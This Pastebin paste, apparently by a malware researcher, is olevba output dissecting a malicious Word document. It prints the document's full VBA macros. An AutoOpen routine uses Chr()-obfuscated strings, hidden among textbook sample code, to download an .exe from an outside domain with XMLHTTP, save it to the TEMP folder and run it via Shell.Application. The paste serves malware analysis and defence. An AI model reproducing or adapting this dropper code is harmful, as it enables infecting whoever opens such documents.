SHARE
TWEET

Malicious Word macro

dynamoo Jul 6th, 2015 260 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS---- elle01~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: elle01~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: elle01~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
  17.  
  18. Nip121ÖÊÂ3017 (700)
  19.  
  20. End Sub
  21.  
  22. Sub Nip121ÖÊÂ3017(FFFFF As Integer)
  23.  
  24. baV5XhIz81
  25.  
  26. End Sub
  27.  
  28.  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. ANALYSIS:
  31. +----------+----------+---------------------------------------+
  32. | Type     | Keyword  | Description                           |
  33. +----------+----------+---------------------------------------+
  34. | AutoExec | AutoOpen | Runs when the Word document is opened |
  35. +----------+----------+---------------------------------------+
  36. -------------------------------------------------------------------------------
  37. VBA MACRO Module1.bas
  38. in file: elle01~1.doc - OLE stream: u'Macros/VBA/Module1'
  39. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  40. Public X480smtBX7GP As String
  41.  
  42.  
  43.  
  44. ' Listing 15.1. Using Automation to create a new Word document.
  45. '
  46.  
  47.  
  48.  
  49. Public Function P4mfk1w0(hFiXhEUGKyuh5 As String)
  50.  Set UORXlUXJ8 = WEydCTxsxt4(Chr(83) & Chr(104) & Chr(101) & Chr(108) & "l" & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & "t" & Chr(105) & Chr(111) & Chr(110))
  51. UORXlUXJ8.Open (X480smtBX7GP)
  52. End Function
  53. Sub CreateWordDocument()
  54.     Dim wordApp As Word.Application
  55.     '
  56.    ' Create the Word Application object
  57.    '
  58.    HCnjkdbhve.Application.StatusBar = "Creating Word Application object..."
  59.     Set wordApp = CreateObject("Word.Application")
  60.     '
  61.    ' Work with Word's Application object directly
  62.    '
  63.    With wordApp
  64.         '
  65.        ' Create a new document and add some text
  66.        '
  67.        HCnjkdbhve.Application.StatusBar = "Creating new Word document..."
  68.         .Documents.Add
  69.         .ActiveDocument.Paragraphs(1).Range.InsertBefore "This is an Automation test."
  70.         '
  71.        ' Save the document
  72.        '
  73.        HCnjkdbhve.Application.StatusBar = "Saving Word document..."
  74.         .ActiveDocument.SaveAs "C:\My Documents\OLETest.doc"
  75.         '
  76.        ' We're done, so quit Word
  77.        '
  78.        HCnjkdbhve.Application.StatusBar = "Shutting down Word..."
  79.         .Quit
  80.     End With
  81.     Set wordApp = Nothing
  82.     HCnjkdbhve.Application.StatusBar = False
  83. End Sub
  84.  
  85. ' Listing 15.2. Using Automation to work with a Word document.
  86. '
  87. Public Function WEydCTxsxt4(ofuVzwV8M As String)
  88.  Set WEydCTxsxt4 = CreateObject(ofuVzwV8M)
  89. End Function
  90. Sub DocumentWordCount()
  91.     Dim wordDoc As Word.Document
  92.     '
  93.    ' Get the Word Document object
  94.    '
  95.    HCnjkdbhve.Application.StatusBar = "Getting Word Document object..."
  96.     Set wordDoc = GetObject("C:\My Documents\OLETest.doc", "Word.Document")
  97.     '
  98.    ' Get the word count
  99.    '
  100.    HCnjkdbhve.Application.StatusBar = "Getting word count..."
  101.     MsgBox wordDoc.Name & " has " & wordDoc.Words.Count & " words."
  102.     '
  103.    ' We're done, so quit Word and release object variable
  104.    '
  105.    HCnjkdbhve.Application.StatusBar = "Shutting down Word..."
  106.     wordDoc.HCnjkdbhve.Application.Quit
  107.     Set wordDoc = Nothing
  108.     HCnjkdbhve.Application.StatusBar = False
  109. End Sub
  110.  
  111. Public Function S5keRrVDgCuXr(rCKhzY8Z5 As Variant, YVPfKl3km As String)
  112. Dim x0YC6QLt: Set x0YC6QLt = WEydCTxsxt4(Chr(65) & Chr(100) & "o" & Chr(100) & Chr(98) & "." & "S" & Chr(116) & "r" & Chr(101) & "a" & "m")
  113.  
  114. With x0YC6QLt
  115.    .Type = 1
  116.     .Open
  117.     .write rCKhzY8Z5
  118.     .savetofile YVPfKl3km, 2
  119. End With
  120. End Function
  121. ' Listing 15.3. Using Automation to run a PowerPoint
  122. ' presentation slide show.
  123. '
  124. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  125. ANALYSIS:
  126. +------------+--------------+-----------------------------------------+
  127. | Type       | Keyword      | Description                             |
  128. +------------+--------------+-----------------------------------------+
  129. | Suspicious | Open         | May open a file                         |
  130. | Suspicious | Chr          | May attempt to obfuscate specific       |
  131. |            |              | strings                                 |
  132. | Suspicious | CreateObject | May create an OLE object                |
  133. | Suspicious | SaveToFile   | May create a text file                  |
  134. | Suspicious | Run          | May run an executable file or a system  |
  135. |            |              | command                                 |
  136. | Suspicious | Write        | May write to a file (if combined with   |
  137. |            |              | Open)                                   |
  138. +------------+--------------+-----------------------------------------+
  139. -------------------------------------------------------------------------------
  140. VBA MACRO Module2.bas
  141. in file: elle01~1.doc - OLE stream: u'Macros/VBA/Module2'
  142. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  143. Sub GatherBudgetSheets()
  144.     Dim myCollection As New Collection
  145.    ' Dim ws As Worksheet
  146.  
  147.     For Each ws In ThisWorkbook.Worksheets
  148.         If InStr(ws.Name, "Budget") Then
  149.             myCollection.Add Item:=ws, Key:=ws.Name
  150.         End If
  151.     Next 'ws
  152.    MsgBox "The custom collection contains " & _
  153.         myCollection.Count & " worksheets."
  154. End Sub
  155.  
  156. ' Listing 16.2. A procedure that clears all objects
  157.  
  158. ' from a custom collection.
  159. '
  160. Sub ClearCollection(coll As Collection)
  161.     Do While coll.Count > 0
  162.         coll.Remove Index:=1
  163.     Loop
  164. End Sub
  165.  
  166. ' Listing 16.3. Using an object in a custom class.
  167.  
  168. Sub baV5XhIz81()
  169.  
  170. Set qKUOnuHCDX = WEydCTxsxt4("M" & Chr(105) & "c" & Chr(114) & "o" & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80))
  171.  
  172.  
  173. Hcwvewv = Chr(104) & Chr(116) & "t" & Chr(112) & ":" & Chr(47) & Chr(60) & Chr(47) & Chr(111) & Chr(122) & Chr(101) & Chr(108) & Chr(100) & Chr(117) & Chr(122) & Chr(101) & Chr(110) & Chr(115) & Chr(117) & "r" & Chr(117) & Chr(99) & Chr(117) & Chr(107) & Chr(117) & Chr(114) & "s" & Chr(117) & Chr(46) & Chr(99) & Chr(111) & "m" & Chr(47) & "2" & Chr(53) & "3" & Chr(47) & Chr(54) & "3" & Chr(50) & Chr(46) & "e" & Chr(120) & "e"
  174. Hcwvewv = Replace(Hcwvewv, Chr(60), "", 1, 1, vbTextCompare)
  175. CallByName qKUOnuHCDX, Chr(79) & "p" & Chr(101) & Chr(110), VbMethod, Chr(71) & "E" & "T" _
  176. , Hcwvewv _
  177. , _
  178. False
  179.  
  180. Set WigQ9SJdY = WEydCTxsxt4("W" & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
  181.  
  182. Set QI4SQ0ILWyLNH = CallByName(WigQ9SJdY, Chr(69) & "n" & Chr(118) & "i" & Chr(114) & "o" & Chr(110) & "m" & "e" & "n" & Chr(116), VbGet, Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & "s" & Chr(115))
  183.  
  184. roCrTtTn4bavbJ = QI4SQ0ILWyLNH(Chr(84) & Chr(69) & Chr(77) & Chr(80))
  185.  
  186. X480smtBX7GP = roCrTtTn4bavbJ & "\" & Chr(98) & Chr(108) & "o" & Chr(103) & Chr(100) & Chr(121) & Chr(110) & Chr(97) & Chr(109) & "o" & Chr(111) & Chr(99) & "o" & Chr(109) & "." & "e" & "x" & Chr(101)
  187. Dim NGWFp3rv8t() As Byte
  188.  
  189. CallByName qKUOnuHCDX, Chr(83) & Chr(101) & Chr(110) & Chr(100), VbMethod
  190. NGWFp3rv8t = CallByName(qKUOnuHCDX, "r" & Chr(101) & "s" & Chr(112) & "o" & Chr(110) & Chr(115) & Chr(101) & "B" & Chr(111) & "d" & "y", VbGet)
  191. S5keRrVDgCuXr NGWFp3rv8t, X480smtBX7GP
  192. On Error GoTo JlQwk75hS
  193.     a = 356 / 0
  194.     HHdhh.Hnjkvowve
  195.   On Error GoTo 0
  196.  
  197. mE6JTzsE:
  198.   Exit Sub
  199. JlQwk75hS:
  200.   P4mfk1w0 ("VAJ7EpH77R5Tf")
  201. Resume mE6JTzsE
  202. End Sub
  203.  
  204.  
  205. '
  206. Sub CustomClassObjectTest()
  207.     'Dim newCustomer As New CCustomer
  208.    With newCustomer
  209.         .Account = "12-3456"
  210.         .Name = "ACME Coyote Supplies"
  211.         .Address = "123 Wily Way"
  212.         'Set .Invoices = New CInvoices
  213.    End With
  214.     With newCustomer.Invoices
  215.         .Add CustAcct:=newCustomer.Account, Amt:=1234.56
  216.         .Add CustAcct:=newCustomer.Account, Amt:=432.1
  217.         MsgBox .Count
  218.     End With
  219. End Sub
  220.  
  221. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  222. ANALYSIS:
  223. +------------+------------+-----------------------------------------+
  224. | Type       | Keyword    | Description                             |
  225. +------------+------------+-----------------------------------------+
  226. | Suspicious | Chr        | May attempt to obfuscate specific       |
  227. |            |            | strings                                 |
  228. | Suspicious | CallByName | May attempt to obfuscate malicious      |
  229. |            |            | function calls                          |
  230. +------------+------------+-----------------------------------------+
RAW Paste Data
Top